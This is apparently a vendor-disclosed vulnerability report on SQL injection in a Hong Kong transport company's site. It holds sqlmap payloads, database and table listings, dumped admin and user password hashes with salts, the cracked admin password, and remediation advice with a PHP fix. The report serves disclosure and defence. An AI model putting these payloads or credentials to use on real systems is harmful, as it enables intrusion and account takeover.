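2015-11-06: Details reported to the vendor; awaiting vendor response
2015-11-10: Vendor confirmed; details disclosed to the vendor only
2015-11-20: Details disclosed to core white hats and experts in related fields
2015-11-30: Details disclosed to regular white hats
2015-12-10: Details disclosed to trainee white hats
2015-12-25: Details disclosed to the public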
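As per the title. 環島旅運 and 環球汽車 are subsidiaries of 冠忠巴士集團 (listed company no. 306), established in 1973 and 1968 respectively. We hold a leading position in the hotel passenger transport service industry, and our main customer base includes most of the world-class hotels in Hong Kong. Our ability to maintain long-term relationships with our customers fully attests to the company's excellent service quality.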
A very simple SQL injection exists:
**.**.**.**/zh/servicedetails.php?id=13 (GET)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13' AND 8653=8653 AND 'XtRO'='XtRO

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=13' AND (SELECT * FROM (SELECT(SLEEP(5)))fKOs) AND 'UXBY'='UXBY

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2618' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787171,0x4667494d4373704d6c6a,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] information_schema
[*] testtransisland
[*] testtransisland_cn
[*] testtransisland_en
[*] transisland
Looking around:
Database: testtransisland
[48 tables]
+------------------------------------+
| banner                             |
| bannernode                         |
| bannernode_seq                     |
| car                                |
| carnode                            |
| carnode_seq                        |
| carprice                           |
| contactus                          |
| faq                                |
| faqnode                            |
| faqnode_seq                        |
| hkexpress                          |
| link                               |
| linknode                           |
| linknode_seq                       |
| news                               |
| newsnode                           |
| newsnode_seq                       |
| otherairportbook                   |
| otherairportbooknode               |
| otherairportbooknode_seq           |
| park                               |
| parknode                           |
| parknode_seq                       |
| password                           |
| promotion                          |
| promotionnode                      |
| promotionnode_seq                  |
| route                              |
| routenode                          |
| routenode_seq                      |
| visitor_counter                    |
| visitor_counter_hk_visit_spot      |
| visitor_counter_news               |
| visitor_counter_pm                 |
| visitor_counter_service21          |
| visitor_counter_servicedetails_1   |
| visitor_counter_servicedetails_100 |
| visitor_counter_servicedetails_101 |
| visitor_counter_servicedetails_13  |
| visitor_counter_servicedetails_26  |
| visitor_counter_servicedetails_90  |
| visitor_counter_servicedetails_91  |
| visitor_counter_servicedetails_93  |
| visitor_counter_servicedetails_97  |
| visitor_counter_servicedetails_99  |
| visitor_counter_servicelist        |
| visitor_counter_sz_visit_spot      |
+------------------------------------+

Database: transisland
[31 tables]
+--------------------------+
| banner                   |
| bannernode               |
| bannernode_seq           |
| car                      |
| carnode                  |
| carnode_seq              |
| carprice                 |
| contactus                |
| faq                      |
| faqnode                  |
| faqnode_seq              |
| link                     |
| linknode                 |
| linknode_seq             |
| news                     |
| newsnode                 |
| newsnode_seq             |
| otherairportbook         |
| otherairportbooknode     |
| otherairportbooknode_seq |
| park                     |
| parknode                 |
| parknode_seq             |
| password                 |
| promotion                |
| promotionnode            |
| promotionnode_seq        |
| route                    |
| routenode                |
| routenode_seq            |
| visitor_counter          |
+--------------------------+
There is quite a lot of data. In the password table:
Database: transisland
Table: password
[1 entry]
+-----------+----------------------------------+------+
| loginName | password                         | salt |
+-----------+----------------------------------+------+
| admin     | 9f104b4c3c4aa9bb8b31e5124dd8e1dd | 593  |
+-----------+----------------------------------+------+
Salting method: md5(md5(password)+salt). After cracking, it comes out as admin admin, a weak password. The other tables are the same:
Database: testtransisland
Table: password
[4 entries]
+-----------+----------------------------------+------+
| loginName | password                         | salt |
+-----------+----------------------------------+------+
| admin     | 4f6679ced9c06ad18451ba14058c99a5 | 528  |
| tom       | 4b62f5b372179ebae56ce8f192ab1c12 | 000  |
| tina      | 4035c949c4df70d88635fe980c0a17f6 | 000  |
| calvin    | 37096795fd55f1554568c880de099bd4 | 000  |
+-----------+----------------------------------+------+
Tested only; did not go any further = =
Filter the parameter; change the encryption method; change the weak passwords
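The first two recommendations above applied to a lookup like servicedetails.php?id=, as an added example that is not the site's own code. The `service` table, the function names and the sample account are hypothetical, SQLite in memory stands in for MySQL, and the "+" in md5(md5(password)+salt) is assumed to mean string concatenation.

```php
<?php
// Added example, not the site's code. The `service` table and the function
// names are hypothetical; only password(loginName, password, salt) is from the report.
$pdo = new PDO('sqlite::memory:');   // stand-in for the MySQL back end
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE service (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO service VALUES (13, 'constructed sample row')");
$pdo->exec('CREATE TABLE password (loginName TEXT, password TEXT, salt TEXT)');

// Filter the parameter: accept only a positive integer, then bind it.
function serviceDetails(PDO $pdo, $rawId) {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                 // caller answers 404; nothing reaches SQL
    }
    $stmt = $pdo->prepare('SELECT id, title FROM service WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Change the hashing: check a legacy md5(md5(password).salt) row once,
// then replace it with password_hash() output ("+" read as concatenation: assumption).
function login(PDO $pdo, $user, $pw) {
    $stmt = $pdo->prepare('SELECT password, salt FROM password WHERE loginName = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$row) {
        return false;
    }
    $stored = $row['password'];
    if (strlen($stored) === 32 && ctype_xdigit($stored)) {      // legacy MD5 row
        if (!hash_equals($stored, md5(md5($pw) . $row['salt']))) {
            return false;
        }
        $up = $pdo->prepare("UPDATE password SET password = ?, salt = '' WHERE loginName = ?");
        $up->execute([password_hash($pw, PASSWORD_DEFAULT), $user]);
        return true;
    }
    return password_verify($pw, $stored);
}

// Constructed data: one legacy account, then a payload string from the sqlmap output.
$pdo->prepare('INSERT INTO password VALUES (?, ?, ?)')
    ->execute(['demo', md5(md5('constructed-Passphrase-1') . '123'), '123']);
var_dump(serviceDetails($pdo, '13'));
var_dump(serviceDetails($pdo, "13' AND 8653=8653 AND 'XtRO'='XtRO"));
var_dump(login($pdo, 'demo', 'constructed-Passphrase-1'));   // legacy path, row upgraded
var_dump(login($pdo, 'demo', 'constructed-Passphrase-1'));   // password_verify path
var_dump(login($pdo, 'demo', 'wrong'));
```

On the MySQL side the password column has to be wide enough for password_hash() output (VARCHAR(255) is the usual choice) before the upgrade path is enabled. password_hash() and hash_equals() need PHP 5.5 and 5.6 respectively, newer than the 5.4.12 that sqlmap fingerprinted.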
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-10 15:26
The relevant organization has been notified of the incident
None yet